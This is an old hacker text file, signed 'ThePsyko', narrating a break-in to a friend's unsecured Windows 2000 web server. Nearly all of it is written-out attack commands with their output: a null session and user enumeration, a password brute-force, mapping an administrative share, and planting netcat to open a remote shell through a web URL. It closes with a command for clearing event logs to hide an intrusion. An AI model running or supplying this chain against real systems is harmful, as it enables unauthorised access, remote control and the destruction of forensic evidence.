Shows how easy it REALLY is to break into an unsecured NT system....



A friend of mine asked me to check the security on his newly installed
windows 2000 server since he was running a website off it.  All he
would provide me was the IP address.  Of course since I knew he was on
DSL I didn't need to do much recon and was able to focus in on his
system directly.

I figured since this was going to be an 'easy' task, I would eschew
any GUI and do this all from command line utilities (they're more fun
anyway J) so my first step was to attempt to establish a null session
using the command

Net use \\192.168.1.1\IPC$ "" /user: ""

Of course, I knew he was a Novell guy and probably hadn't studied NT
security much so it was no surprise to get the response:

The command completed successfully

Ok, now I that I had a Null session to the remote system I used a
program called 'enum' to take a look at the users, shares, and
policies of the system. Using the command

Enum -U -M -S -P -G -L -d 192.168.1.1 >enum.txt

Which provided me with the following output:

server: 192.168.1.1
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
  netbios: SERVER
  domain: WEB
quota:
  paged pool limit: 33554432
  non paged pool limit: 1048576
  min work set size: 65536
  max work set size: 251658240
  pagefile limit: 0
  time limit: 0
trusted domains:
  indeterminate
netlogon done by a PDC server
getting user list (pass 1, index 0)... success, got 3.
  Administrator   attributes
  Guest (Built-in account for guest access to the computer/domain)
  attributes: disabled no_passwd 
  nobody (Built-in account for administering the computer/domain)
  attributes: 
enumerating shares (pass 1)... got 3 shares, 0 left:
  fs: C$ ()
  fs: D$ ()
  fs: E$ ()
  ipc: IPC$ (Remote IPC)
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
SERVER\nobody
Group: Backup Operators
Group: Guests
SERVER\Guest
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
SERVER\Administrator
cleaning up... success.

As you can see, that's more than enough info to start with.  Looking
down the list, it is obvious that the original administrator account
had been renamed to 'nobody' and a fake 'administrator' account had
been set up, most likely with shit permissions.

Needless to say, it was to be the 'nobody' account that I would hit
next with the command:

Nat -o output.txt -u nobody.txt -p passlist.txt 192.168.1.1 

Which revealed the password 'sadie' after about 30 minutes.  From
there, it was simple to map a drive with

Net use y: \\192.168.1.1\d$ /user:nobody

And then enter the password (sadie) when prompted.  From there I was
able to copy netcat into the /scripts directory where I could activate
it at will by typing the command:

http://192.168.1.1/cgi-bin/nc.exe?+-l+-p+5000+-t+-e+cmd.exe

into my browser.  From there I only had to drop to a DOS prompt and
type:

TELNET>open 192.168.1.1 5000

To get a command prompt on the remote system.

Needless to say, after I kicked my friends ass, I had him set
RestrictAnonymous=1 which stops both the null connection AND enum from
working.  However, there are still a LOT of systems out there that
have RestrictAnonymous=0 (which is the default) and are vulnerable.

Of course I didn't bother to clean the logs since I was there with
permission and I wanted him to see the entries, but had I been there
maliciously, I would have uploaded ClearEventLog and run the command 

ClearEL all

which would have cleared all 3 eventlogs and effectively masked my
presence :)

ThePsyko
Public Enemy #7
"God told me to skin you alive"

http://prozac.iscool.net